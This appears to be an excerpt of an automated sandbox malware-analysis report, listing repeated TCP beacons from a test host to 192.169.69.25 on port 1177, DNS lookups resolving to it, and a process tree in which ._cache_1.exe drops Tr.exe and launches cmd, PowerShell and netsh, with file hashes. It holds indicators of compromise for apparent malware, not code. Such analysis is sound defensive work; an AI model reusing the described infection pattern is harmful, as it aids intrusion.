Jul 1, 2024 10:22:57.538625002 CEST | 1177 | 49167 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:57.538697004 CEST | 49167 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:57.541620016 CEST | 49167 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:57.546746016 CEST | 1177 | 49167 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:07.301902056 CEST | 1177 | 49167 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:07.302130938 CEST | 49167 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:09.836111069 CEST | 49167 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:09.841063023 CEST | 1177 | 49167 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:11.184724092 CEST | 49168 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:11.189582109 CEST | 1177 | 49168 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:11.189645052 CEST | 49168 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:11.211026907 CEST | 49168 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:11.216376066 CEST | 1177 | 49168 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:21.077224016 CEST | 1177 | 49168 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:21.077430010 CEST | 49168 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:23.588432074 CEST | 49168 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:23.593616962 CEST | 1177 | 49168 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:24.893331051 CEST | 49169 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:24.898138046 CEST | 1177 | 49169 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:24.898195028 CEST | 49169 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:24.901144028 CEST | 49169 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:24.906815052 CEST | 1177 | 49169 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:34.700531960 CEST | 1177 | 49169 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:34.700599909 CEST | 49169 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:37.207242012 CEST | 49169 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:37.212090969 CEST | 1177 | 49169 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:38.652074099 CEST | 49170 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:38.658783913 CEST | 1177 | 49170 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:38.658849955 CEST | 49170 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:38.664412975 CEST | 49170 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:38.669179916 CEST | 1177 | 49170 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:48.631632090 CEST | 1177 | 49170 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:48.631793022 CEST | 49170 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:51.138029099 CEST | 49170 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:51.143104076 CEST | 1177 | 49170 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:52.456696987 CEST | 49171 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:52.462095022 CEST | 1177 | 49171 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:52.462150097 CEST | 49171 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:52.503012896 CEST | 49171 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:52.507802963 CEST | 1177 | 49171 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:02.339181900 CEST | 1177 | 49171 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:02.339241982 CEST | 49171 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:04.850470066 CEST | 49171 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:04.855521917 CEST | 1177 | 49171 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:06.123507977 CEST | 49172 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:06.129070044 CEST | 1177 | 49172 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:06.129123926 CEST | 49172 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:06.132111073 CEST | 49172 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:06.138037920 CEST | 1177 | 49172 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:15.846599102 CEST | 1177 | 49172 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:15.846662998 CEST | 49172 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:18.347311020 CEST | 49172 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:18.353022099 CEST | 1177 | 49172 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:19.562786102 CEST | 49173 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:19.568671942 CEST | 1177 | 49173 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:19.568731070 CEST | 49173 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:19.571507931 CEST | 49173 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:19.577858925 CEST | 1177 | 49173 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:29.287723064 CEST | 1177 | 49173 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:29.287787914 CEST | 49173 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:31.799869061 CEST | 49173 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:31.804816008 CEST | 1177 | 49173 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:33.169706106 CEST | 49174 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:33.174592972 CEST | 1177 | 49174 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:33.174645901 CEST | 49174 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:33.177433968 CEST | 49174 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:33.182415962 CEST | 1177 | 49174 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:42.832195044 CEST | 1177 | 49174 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:42.832261086 CEST | 49174 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:45.332547903 CEST | 49174 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:45.337513924 CEST | 1177 | 49174 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:46.804841995 CEST | 49175 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:46.809634924 CEST | 1177 | 49175 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:46.809688091 CEST | 49175 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:46.813103914 CEST | 49175 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:46.817867994 CEST | 1177 | 49175 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:56.436570883 CEST | 1177 | 49175 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:56.436642885 CEST | 49175 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:58.935719013 CEST | 49175 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:58.940599918 CEST | 1177 | 49175 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:25:00.095324039 CEST | 49176 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:00.100171089 CEST | 1177 | 49176 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:25:00.100229025 CEST | 49176 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:00.126873016 CEST | 49176 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:00.131733894 CEST | 1177 | 49176 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:25:10.056014061 CEST | 1177 | 49176 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:25:10.056083918 CEST | 49176 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:12.554662943 CEST | 49176 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:12.891005039 CEST | 1177 | 49176 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:25:13.879167080 CEST | 49177 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:13.883944988 CEST | 1177 | 49177 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:25:13.884022951 CEST | 49177 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:13.886976957 CEST | 49177 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:13.891685009 CEST | 1177 | 49177 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:25:23.730521917 CEST | 1177 | 49177 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:25:23.730634928 CEST | 49177 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:26.236083984 CEST | 49177 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:26.244396925 CEST | 1177 | 49177 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:25:27.482148886 CEST | 49178 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:27.486994028 CEST | 1177 | 49178 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:25:27.487052917 CEST | 49178 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:27.489938974 CEST | 49178 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:25:27.494779110 CEST | 1177 | 49178 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:25:37.226639032 CEST | 1177 | 49178 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:25:37.226711988 CEST | 49178 | 1177 | 192.168.2.22 | 192.169.69.25 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 1, 2024 10:21:48.948687077 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:21:49.187190056 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:22:03.579130888 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:22:03.675848961 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:22:16.964905977 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:22:16.972282887 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:22:30.414474010 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:22:30.423101902 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:22:43.775082111 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:22:43.871335030 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:22:57.421171904 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:22:57.525254011 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:22:57.526057959 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:22:57.533214092 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:23:11.080198050 CEST | 54998 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:23:11.178054094 CEST | 53 | 54998 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:23:11.178210974 CEST | 54998 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:23:11.184412956 CEST | 53 | 54998 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:23:24.886133909 CEST | 52781 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:23:24.893004894 CEST | 53 | 52781 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:23:38.442511082 CEST | 63926 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:23:38.449755907 CEST | 53 | 63926 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:23:38.450578928 CEST | 63926 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:23:38.547743082 CEST | 53 | 63926 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:23:38.547965050 CEST | 63926 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:23:38.643939018 CEST | 53 | 63926 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:23:38.644143105 CEST | 63926 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:23:38.651654959 CEST | 53 | 63926 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:23:52.449409008 CEST | 65510 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:23:52.456350088 CEST | 53 | 65510 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:24:06.115314007 CEST | 62672 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:24:06.123188019 CEST | 53 | 62672 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:24:19.455228090 CEST | 56475 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:24:19.555124998 CEST | 53 | 56475 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:24:19.555326939 CEST | 56475 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:24:19.562397003 CEST | 53 | 56475 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:24:32.959522963 CEST | 49384 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:24:33.057414055 CEST | 53 | 49384 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:24:33.057579994 CEST | 49384 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:24:33.154347897 CEST | 53 | 49384 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:24:33.160860062 CEST | 49384 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:24:33.167848110 CEST | 53 | 49384 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:24:46.601497889 CEST | 54842 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:24:46.700021029 CEST | 53 | 54842 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:24:46.700238943 CEST | 54842 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:24:46.797113895 CEST | 53 | 54842 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:24:46.797359943 CEST | 54842 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:24:46.804418087 CEST | 53 | 54842 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:25:00.088176012 CEST | 58105 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:25:00.094950914 CEST | 53 | 58105 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:25:13.871896982 CEST | 64928 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:25:13.878819942 CEST | 53 | 64928 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:25:27.467930079 CEST | 57390 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:25:27.474947929 CEST | 53 | 57390 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2024 10:25:27.475079060 CEST | 57390 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2024 10:25:27.481844902 CEST | 53 | 57390 | 8.8.8.8 | 192.168.2.22 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jul 1, 2024 10:21:48.948687077 CEST | 192.168.2.22 | 8.8.8.8 | 0x72cc | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:22:03.579130888 CEST | 192.168.2.22 | 8.8.8.8 | 0xe344 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:22:16.964905977 CEST | 192.168.2.22 | 8.8.8.8 | 0x7989 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:22:30.414474010 CEST | 192.168.2.22 | 8.8.8.8 | 0xe221 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:22:43.775082111 CEST | 192.168.2.22 | 8.8.8.8 | 0x2f1f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:22:57.421171904 CEST | 192.168.2.22 | 8.8.8.8 | 0xae13 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:22:57.526057959 CEST | 192.168.2.22 | 8.8.8.8 | 0xae13 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:23:11.080198050 CEST | 192.168.2.22 | 8.8.8.8 | 0xa9a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:23:11.178210974 CEST | 192.168.2.22 | 8.8.8.8 | 0xa9a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:23:24.886133909 CEST | 192.168.2.22 | 8.8.8.8 | 0x2c8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:23:38.442511082 CEST | 192.168.2.22 | 8.8.8.8 | 0x5291 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:23:38.450578928 CEST | 192.168.2.22 | 8.8.8.8 | 0x5291 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:23:38.547965050 CEST | 192.168.2.22 | 8.8.8.8 | 0x5291 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:23:38.644143105 CEST | 192.168.2.22 | 8.8.8.8 | 0x5291 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:23:52.449409008 CEST | 192.168.2.22 | 8.8.8.8 | 0xfbdd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:24:06.115314007 CEST | 192.168.2.22 | 8.8.8.8 | 0x5c1e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:24:19.455228090 CEST | 192.168.2.22 | 8.8.8.8 | 0x8d87 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:24:19.555326939 CEST | 192.168.2.22 | 8.8.8.8 | 0x8d87 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:24:32.959522963 CEST | 192.168.2.22 | 8.8.8.8 | 0x69cd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:24:33.057579994 CEST | 192.168.2.22 | 8.8.8.8 | 0x69cd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:24:33.160860062 CEST | 192.168.2.22 | 8.8.8.8 | 0x69cd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:24:46.601497889 CEST | 192.168.2.22 | 8.8.8.8 | 0x23d5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:24:46.700238943 CEST | 192.168.2.22 | 8.8.8.8 | 0x23d5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:24:46.797359943 CEST | 192.168.2.22 | 8.8.8.8 | 0x23d5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:25:00.088176012 CEST | 192.168.2.22 | 8.8.8.8 | 0x1dcb | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:25:13.871896982 CEST | 192.168.2.22 | 8.8.8.8 | 0x9764 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:25:27.467930079 CEST | 192.168.2.22 | 8.8.8.8 | 0x6436 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jul 1, 2024 10:25:27.475079060 CEST | 192.168.2.22 | 8.8.8.8 | 0x6436 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jul 1, 2024 10:21:49.187190056 CEST | 8.8.8.8 | 192.168.2.22 | 0x72cc | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:22:03.675848961 CEST | 8.8.8.8 | 192.168.2.22 | 0xe344 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:22:16.972282887 CEST | 8.8.8.8 | 192.168.2.22 | 0x7989 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:22:30.423101902 CEST | 8.8.8.8 | 192.168.2.22 | 0xe221 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:22:43.871335030 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f1f | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:22:57.525254011 CEST | 8.8.8.8 | 192.168.2.22 | 0xae13 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:22:57.533214092 CEST | 8.8.8.8 | 192.168.2.22 | 0xae13 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:23:11.178054094 CEST | 8.8.8.8 | 192.168.2.22 | 0xa9a | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:23:11.184412956 CEST | 8.8.8.8 | 192.168.2.22 | 0xa9a | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:23:24.893004894 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c8 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:23:38.449755907 CEST | 8.8.8.8 | 192.168.2.22 | 0x5291 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:23:38.547743082 CEST | 8.8.8.8 | 192.168.2.22 | 0x5291 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:23:38.643939018 CEST | 8.8.8.8 | 192.168.2.22 | 0x5291 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:23:38.651654959 CEST | 8.8.8.8 | 192.168.2.22 | 0x5291 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:23:52.456350088 CEST | 8.8.8.8 | 192.168.2.22 | 0xfbdd | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:24:06.123188019 CEST | 8.8.8.8 | 192.168.2.22 | 0x5c1e | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:24:19.555124998 CEST | 8.8.8.8 | 192.168.2.22 | 0x8d87 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:24:19.562397003 CEST | 8.8.8.8 | 192.168.2.22 | 0x8d87 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:24:33.057414055 CEST | 8.8.8.8 | 192.168.2.22 | 0x69cd | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:24:33.154347897 CEST | 8.8.8.8 | 192.168.2.22 | 0x69cd | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:24:33.167848110 CEST | 8.8.8.8 | 192.168.2.22 | 0x69cd | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:24:46.700021029 CEST | 8.8.8.8 | 192.168.2.22 | 0x23d5 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:24:46.797113895 CEST | 8.8.8.8 | 192.168.2.22 | 0x23d5 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:24:46.804418087 CEST | 8.8.8.8 | 192.168.2.22 | 0x23d5 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:25:00.094950914 CEST | 8.8.8.8 | 192.168.2.22 | 0x1dcb | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:25:13.878819942 CEST | 8.8.8.8 | 192.168.2.22 | 0x9764 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:25:27.474947929 CEST | 8.8.8.8 | 192.168.2.22 | 0x6436 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false | ||
Jul 1, 2024 10:25:27.481844902 CEST | 8.8.8.8 | 192.168.2.22 | 0x6436 | No error (0) | 192.169.69.25 | A (IP address) | IN (0x0001) | false |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 04:21:25 |
Start date: | 01/07/2024 |
Path: | C:\Users\user\Desktop\._cache_1.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'178'304 bytes |
MD5 hash: | 62C01F1B2AC0A7BAB6C3B50FD51E6A36 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 1 |
Start time: | 04:21:26 |
Start date: | 01/07/2024 |
Path: | C:\Users\user\AppData\Local\Temp\Tr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xac0000 |
File size: | 915'456 bytes |
MD5 hash: | 4D3B21451ED0EE3EE65888D4C8944693 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 04:21:37 |
Start date: | 01/07/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x4a330000 |
File size: | 345'088 bytes |
MD5 hash: | 5746BD7E255DD6A8AFA06F7C42C1BA41 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 04:21:38 |
Start date: | 01/07/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13faf0000 |
File size: | 443'392 bytes |
MD5 hash: | A575A7610E5F003CC36DF39E07C4BA7D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Has exited: | false |
Target ID: | 6 |
Start time: | 04:21:42 |
Start date: | 01/07/2024 |
Path: | C:\Windows\System32\netsh.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xf70000 |
File size: | 87'040 bytes |
MD5 hash: | 637982A421D0133DCEAA0D1490D1DC9C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 7 |
Start time: | 04:21:46 |
Start date: | 01/07/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x4a190000 |
File size: | 345'088 bytes |
MD5 hash: | 5746BD7E255DD6A8AFA06F7C42C1BA41 |
Has elevated privileges: | true |
